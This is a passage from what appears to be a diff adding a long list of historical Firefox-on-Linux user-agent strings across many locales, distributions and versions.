Firefox/2.0 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1) Gecko/20061127 Firefox/2.0 (Gentoo Linux) +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18 (.NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7) +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.0.3) Gecko/20060523 Ubuntu/dapper Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8.1.1) Gecko/20061208 Firefox/2.0.0.1 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.2) Gecko/2008092313 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.7.6) Gecko/20050318 Firefox/1.0.2 +Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.8.1.11) Gecko/20071201 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.2) Gecko/20090804 Firefox/3.5.2 +Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.2a1pre) Gecko/20090405 Ubuntu/9.04 (jaunty) Firefox/3.6a1pre +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.0.7) Gecko/20060921 Ubuntu/dapper-security Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.1) Gecko/2008071719 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.0.5) Gecko/2008121622 Ubuntu/8.10 (intrepid) Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.3) Gecko/20091020 Ubuntu/10.04 (lucid) Firefox/4.0.1 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.3a5pre) Gecko/20100526 Firefox/3.7a5pre +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9b5) Gecko/2008032600 SUSE/2.9.95-25.1 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9) Gecko/2008061812 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20040913 Firefox/0.10 +Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20040914 Firefox/0.10 +Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20040914 Firefox/0.10.1 +Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041001 Firefox/0.10.1 +Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041020 Firefox/0.10.1 +Mozilla/5.0 (X11; U; Linux i686; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1 +Mozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/2008080808 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux i686; rv:1.9) Gecko/20080810020329 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.1) Gecko/20090630 Fedora/3.5-1.fc11 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9) Gecko/2008061015 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.8.0.13pre) Gecko/20071126 Ubuntu/dapper-security Firefox/1.5.0.13pre +Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.8.0.8) Gecko/20061108 Fedora/1.5.0.8-1.fc5 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.8.1.2) Gecko/20061023 SUSE/2.0.0.2-1.1 Firefox/2.0.0.2 +Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux i686; sv-SE; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 +Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.8.1) Gecko/20061023 SUSE/2.0-30 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9b5) Gecko/2008032600 SUSE/2.9.95-25.1 Firefox/3.0b5 +Mozilla/5.0 (X11; U; Linux i686; Ubuntu 7.04; de-CH; rv:1.8.1.5) Gecko/20070309 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.3 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1) Gecko/20090624 Firefox/3.5 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-GB; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-GB; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-GB; rv:1.9.2.17) Gecko/20110420 Firefox/3.6.17 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.10) Gecko/20060911 SUSE/1.5.0.10-0.2 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.12) Gecko/20080326 CentOS/1.5.0.12-14.el5.centos Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.5) Gecko/20060726 Red Hat/1.5.0.5-0.el4.1 Firefox/1.5.0.5 pango-text +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.2 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.9) Gecko/20061219 Fedora/1.5.0.9-1.fc6 Firefox/1.5.0.9 pango-text +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.1 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.2 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.10) Gecko/20071115 Firefox/2.0.0.10 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.14) Gecko/20080417 Firefox/2.0.0.14 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.16) Gecko/20080716 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20090206 Firefox/2.0.0.20 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.2pre) Gecko/20061023 SUSE/2.0.0.1-0.1 Firefox/2.0.0.2pre +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.5) Gecko/20070718 Fedora/2.0.0.5-1.fc7 Firefox/2.0.0.5 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9a1) Gecko/20060127 Firefox/1.6a1 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9b2) Gecko/2007121016 Firefox/3.0b2 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); fr; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); nl; rv:1.8.0.6) Gecko/20060728 SUSE/1.5.0.6-1.2 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); ru; rv:1.8.0.3) Gecko/20060425 SUSE/1.5.0.3-7 Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux i686 (x86_64); zh-TW; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6 +Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.6) Gecko/20091216 Fedora/3.5.6-1.fc11 Firefox/3.5.6 GTB6 +Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8 +Mozilla/5.0 (X11; U; Linux i686; zh-CN; rv:1.9.2.8) Gecko/20100722 Ubuntu/10.04 (lucid) Firefox/3.6.8 +Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.8.0.10) Gecko/20070508 Fedora/1.5.0.10-1.fc5 Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.8.1) Gecko/20061010 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.13) Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13 +Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux i686; zh-TW; rv:1.9.0.7) Gecko/2009030422 Ubuntu/8.04 (hardy) Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux ia64; en-US; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux MIPS32 1074Kf CPS QuadCore; en-US; rv:1.9.2.13) Gecko/20110103 Fedora/3.6.13-1.fc14 Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux sparc64; en-US; rv:1.8.1.17) Gecko/20081108 Firefox/2.0.0.17 +Mozilla/5.0 (X11; U; Linux x64_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.0.4) Gecko/2008111318 Ubuntu/8.04 (hardy) Firefox/3.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.7) Gecko/20100106 Ubuntu/9.10 (karmic) Firefox/3.5.7 +Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9 +Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; de-AT; rv:1.8.0.2) Gecko/20060422 Firefox/1.5.0.2 +Mozilla/5.0 (X11; U; Linux x86_64; de-DE; rv:1.8.1.6) Gecko/20070802 Firefox/2.0.0.6 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.8.1.12) Gecko/20080203 SUSE/2.0.0.12-6.1 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.8.1.12) Gecko/20080208 Fedora/2.0.0.12-1.fc8 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.11) Gecko/2009070611 Gentoo Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.3) Gecko/2008090713 Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.7) Gecko/2009030620 Gentoo Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.9) Gecko/2009042114 Ubuntu/9.04 (jaunty) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.1.10) Gecko/20100506 SUSE/3.5.10-0.1.1 Firefox/3.5.10 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 GTB7.1 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.3) Gecko/20100401 SUSE/3.6.3-1.1 Firefox/3.6.3 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2) Gecko/20100308 Ubuntu/10.04 (lucid) Firefox/3.6 +Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9) Gecko/2008061017 Firefox/3.0 +Mozilla/5.0 (X11; U; Linux x86_64; el-GR; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1.12) Gecko/20080203 SUSE/2.0.0.12-0.1 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.10) Gecko/2009042523 Ubuntu/9.04 (jaunty) Firefox/3.0.10 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.12) Gecko/2009070811 Ubuntu/9.04 (jaunty) Firefox/3.0.12 FirePHP/0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1 FirePHP/0.1.1.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.2) Gecko/2008092213 Ubuntu/8.04 (hardy) Firefox/3.0.2 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.5) Gecko/2008122010 Firefox/3.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.7) Gecko/2009030503 Fedora/3.0.7-1.fc9 Firefox/3.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.8) Gecko/2009032712 Ubuntu/8.10 (intrepid) Firefox/3.0.8 FirePHP/0.2.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/8.10 (intrepid) Firefox/3.0.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.13) Gecko/20101206 Red Hat/3.6-2.el5 Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.9.2.13) Gecko/20101206 Ubuntu/9.10 (karmic) Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-NZ; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) Gecko Firefox/3.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.10) Gecko/20050724 Firefox/1.0.6 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051127 Firefox/1.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20051218 Firefox/1.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.12) Gecko/20060202 CentOS/1.0.7-1.4.3.centos4 Firefox/1.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.10) Gecko/20070409 CentOS/1.5.0.10-2.el5.centos Firefox/1.5.0.10 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.12) Gecko/20070530 Fedora/1.5.0.12-1.fc6 Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.12) Gecko/20070718 Red Hat/1.5.0.12-3.el5 Firefox/1.5.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.12) Gecko/20080419 CentOS/1.5.0.12-0.15.el4.centos Firefox/1.5.0.12 pango-text +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.1) Gecko/20060313 Fedora/1.5.0.1-9 Firefox/1.5.0.1 pango-text +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.3) Gecko/20060522 Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.3) Gecko/20060523 Ubuntu/dapper Firefox/1.5.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.4) Gecko/20060608 Ubuntu/dapper-security Firefox/1.5.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.5) Gecko/20060911 Firefox/1.5.0.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060911 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060919 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060921 Ubuntu/dapper-security Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.7) Gecko/20060924 Firefox/1.5.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.0.9) Gecko/20070126 Ubuntu/dapper-security Firefox/1.5.0.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.10) Gecko/20061201 Firefox/2.0.0.10 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20070914 Mandriva/2.0.0.11-1.1mdv2008.0 (2008.0) Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071201 Firefox/2.0.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080129 Firefox/2.0.0.8 (Debian-2.0.0.12-1) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080203 SUSE/2.0.0.12-0.1 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.12) Gecko/20080214 Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.13) Gecko/20080208 Mandriva/2.0.0.13-1mdv2008.1 (2008.1) Firefox/2.0.0.13 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.15) Gecko/20080702 Ubuntu/8.04 (hardy) Firefox/2.0.0.15 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.16) Gecko/20080719 Firefox/2.0.0.16 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.18) Gecko/20081112 Fedora/2.0.0.18-1.fc8 Firefox/2.0.0.18 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.18) Gecko/20081113 Ubuntu/8.04 (hardy) Firefox/2.0.0.18 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.19) Gecko/20081213 SUSE/2.0.0.19-0.1 Firefox/2.0.0.19 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.1) Gecko/20060601 Firefox/2.0.0.1 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.3) Gecko/20061201 Firefox/2.0.0.3 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.3) Gecko/20070322 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.3) Gecko/20070324 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.3) Gecko/20070415 Firefox/2.0.0.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070529 SUSE/2.0.0.4-6.1 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070604 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20070627 Firefox/2.0.0.4 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.7) Gecko/20070918 Firefox/2.0.0.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071015 SUSE/2.0.0.8-1.1 Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071022 Ubuntu/7.10 (gutsy) Firefox/2.0.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20060601 Firefox/2.0 (Ubuntu-edgy) +Mozilla/5.0 (X11; U; Linux x86-64; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061023 SUSE/2.0-37 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061122 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061128 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1) Gecko/20061202 Firefox/2.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8) Gecko/20051201 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8) Gecko/20051212 Firefox/1.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009060309 Linux Mint/7 (Gloria) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.11) Gecko/2009061118 Fedora/3.0.11-1.fc9 Firefox/3.0.11 